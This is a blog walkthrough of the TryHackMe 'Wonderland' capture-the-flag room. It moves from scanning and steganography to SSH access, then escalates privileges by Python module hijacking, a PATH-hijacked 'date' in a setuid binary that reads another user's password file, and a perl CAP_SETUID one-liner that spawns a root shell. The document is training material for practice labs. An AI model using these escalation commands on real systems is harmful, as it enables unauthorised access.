Contents

Wonderland

Updated on 2020-06-18

Fall down the rabbit hole and enter wonderland.

Difficulty: Medium

Room: Wonderland

Created by: NinjaJc01

Standard nmap scan

nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
🚀 nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDe20sKMgKSMTnyRTmZhXPxn+xLggGUemXZLJDkaGAkZSMgwM3taNTc8OaEku7BvbOkqoIya4ZI8vLuNdMnESFfB22kMWfkoB0zKCSWzaiOjvdMBw559UkLCZ3bgwDY2RudNYq5YEwtqQMFgeRCC1/rO4h4Hl0YjLJufYOoIbK0EPaClcDPYjp+E1xpbn3kqKMhyWDvfZ2ltU1Et2MkhmtJ6TH2HA+eFdyMEQ5SqX6aASSXM7OoUHwJJmptyr2aNeUXiytv7uwWHkIqk3vVrZBXsyjW4ebxC3v0/Oqd73UWd5epuNbYbBNls06YZDVI8wyZ0eYGKwjtogg5+h82rnWN
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHH2gIouNdIhId0iND9UFQByJZcff2CXQ5Esgx1L96L50cYaArAW3A3YP3VDg4tePrpavcPJC2IDonroSEeGj6M=
|   256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAsWAdr9g04J7Q8aeiWYg03WjPqGVS6aNf/LF+/hMyKh
80/tcp open  http    syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The inital scan shows HTTP 80 open and SSH on port 22.


We notice there’s 3 directories gobuster finds with directory-list-2.3-medum.txt. We can ignore the weird http:/www results. Let’s check out these directories in a browser.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
🚀 gobuster dir -u http://$IP/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================

===============================================================
/img (Status: 301)
/r (Status: 301)
/poem (Status: 301)
/http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fyoutube (Status: 301)
/http%3A%2F%2Fblogs (Status: 301)
/http%3A%2F%2Fblog (Status: 301)
/**http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fcommunity (Status: 301)
/http%3A%2F%2Fradar (Status: 301)
/http%3A%2F%2Fjeremiahgrossman (Status: 301)
/http%3A%2F%2Fweblog (Status: 301)
/http%3A%2F%2Fswik (Status: 301)
===============================================================

===============================================================

Viewing alice_door.jpg and alice_door.png we notice the images are practically the same but it looks like a filter was applied which could indicate steg. Typically I run binwalk -e or use something like stegoveritas (stegoVeritas repo). Since steghide is included in kali’s base image we’ll use that.

/images/wonderland/img.png

We find hint.txt in white_rabbit_1.jpeg.

1
2
3
4
5
6
🚀 steghide extract -sf white_rabbit_1.jpeg
Enter passphrase:
wrote extracted data to "hint.txt".

🚀 cat hint.txt
follow the r a b b i t#

Follow the r a b b i t … Interesting. We’ll keep this in our back pocket.

Navigating to /r we are given a clue to Keep going.

This probably hint’s we have more enumeration to do. Looking at the source we don’t find any more hints. Let’s run another gobuster scan but append /r/ to the url.

/images/wonderland/r.png
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
🚀 gobuster dir -u http://$IP/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================

===============================================================
/a (Status: 301)
/http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fyoutube (Status: 301)
/http%3A%2F%2Fblogs (Status: 301)
/http%3A%2F%2Fblog (Status: 301)
/**http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fcommunity (Status: 301)
/http%3A%2F%2Fradar (Status: 301)
/http%3A%2F%2Fjeremiahgrossman (Status: 301)
/http%3A%2F%2Fweblog (Status: 301)
/http%3A%2F%2Fswik (Status: 301)
===============================================================

===============================================================

If you haven’t figured it out yet we’ll need to get to /r/a/b/b/i/t to find our next clue.

/images/wonderland/ra.png /images/wonderland/rab.png /images/wonderland/rabb.png


Looks like we finally found alice_door.png from /img. Let’s take a look at the source.

/images/wonderland/rabbit.png

We find our foothold.. Alice’s creds. Let’s get a shell as alice with SSH.

/images/wonderland/rabbit_source.png/images/wonderland/alice_ls.png

What is root.txt doing here? We must be in wonderland. This part tripped me up a little bit. Things must be reversed. Let’s see if we can read or write anything in /root.

/images/wonderland/alice_ls_root.png

Maybe user.txt is in /root?

/images/wonderland/user.png

Found user.txt!


Let’s see what we can run as sudo with sudo -l. Since NOPASSWD is not set in /etc/sudoers we’ll need to use alice’s password.

/images/wonderland/alice_sudo_l.png

Interesting.. we can run a python script as a user rabbit in our home directory.

Looking at /etc/passwd we have a few users.

1
2
3
4
5
root❌0:0:root:/root:/bin/bash
tryhackme❌1000:1000:tryhackme:/home/tryhackme:/bin/bash
alice❌1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter❌1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit❌1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash

The script runs a for loop and prints random lines of The Walrus and the Carpenter by Lewis Carroll. The lines are generated using python’s random library.

Although it’s not relevant for this box I found it interesting Lewis Carroll published The Alphabet Cipher in a magazine describing the Vigenère cipher. The Walrus and the Carpenter Wikipedia | The Alphabet Cipher

vim walrus_and_the_carpenter.py

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

There’s really nothing we can do with this script in the current state as it just prints random lines. Python library hijacking is just the job for this. I’ve included reading material below which describes this method. We’ll create our own random module that walrus_and_the_carpenter.py will import.

Python’s search path for modules is outlined in the documentation here: The Module Search Path

TLDR:

  1. The directory containing the input script (or the current directory when no file is specified).
  2. PYTHONPATH (a list of directory names, with the same syntax as the shell variable PATH).
  3. The installation-dependent default.

1. The directory containing the input script

It’s really up to you what to make random.py. I opted to just spawn a shell as rabbit because we’re running this as rabbit.

1
2
3
#!/usr/bin/python3.6
import pty
pty.spawn("/bin/bash")

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

/images/wonderland/rabbit_home.png

Download teaParty locally. Since we know alice’s password and you have a shell as rabbit you could chmod 777 /home/rabbit and scp it back to your machine or copy the binary to alice’s home directory. Do you.

I used ghidra to do the decompiling and analysis. You could also do this with cutter or whatever tool you like.

/images/wonderland/main.png

Looking at main we see there’s a set uid and set gid for 1003 which is hatter. Then it echo’s the time + 1 hour and prints the date in RFC 5322 format.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
void main(void)
{
  setuid(0x3eb);
  setgid(0x3eb);
  puts("Welcome to the tea party!\nThe Mad Hatter will be here soon.");
  system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R");
  puts("Ask very nicely, and I will give you some tea while you wait for him");
  getchar();
  puts("Segmentation fault (core dumped)");
  return;
}

We can use environment path manipulation since date is not using an absolute path like /bin/echo is. We can confirm teaParty is essentially making us hatter by creating date that calls id and whoami. Notice it doesn’t actually set gid 1003…

First we’ll want to prepend /home/rabbit to our path by doing PATH=/home/rabbit:$PATH.

1
2
3
#!/bin/sh
id;
whoami;

Execute teaParty

/images/wonderland/teaparty_id.png

Now that we know we can become hatter let’s create a fake date executable and see what’s in /home/hatter.

Make sure to chmod +x date before executing teaParty

1
2
#!/bin/sh
ls -la /home/hatter

Execute teaParty

/images/wonderland/teaparty_ls.png
1
2
#!/bin/sh
cat /home/hatter/password.txt

Execute teaParty

/images/wonderland/teaparty_cat.png

We now have hatters password. Let’s SSH as him.

From here I uploaded linPEAS and LinEnum which lead me to discover the hatter group (id 1003) is the owner of /usr/bin/perl5.26.1 and /usr/bin/perl. It’s probably something easily overlooked but it’s important to enumerate things owned the user’s group as well as what capabilities binaries have with getcap -r / 2>/dev/null. Most auto enumeration scripts like linpeas, lse, linenum will search for this for you. Don’t overlook it as it could be an easy path to root.

/images/wonderland/perl.png

RE: Perl GTFOBins - Capabilities

It can manipulate its process UID and can be used on Linux as a backdoor to maintain elevated privileges with the CAP_SETUID capability set. This also works when executed by another binary with the capability set.

Now that we know perl is capable of setting UID to 0(root) we can get our root shell to cat root.txt in /home/alice/

1
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
/images/wonderland/root.png

This was a very fun challenge from NinjaJc01. As hackers it can be easy to get caught up with immediate discoveries that could ultimately lead you down rabbit holes. I believe going back to fundamentals and knowing when to move on is an important mindset to have.

Swissky (The creator of the PayLoadAllTheThings) and contributors have compiled a clean but comprehensive checklist for linux privesc. When I find myself hitting a wall or following the rabbit as it was… I usually run through this checklist to find my bearings.

PayloadAllTheThings Linux Privilege Escalation Checklist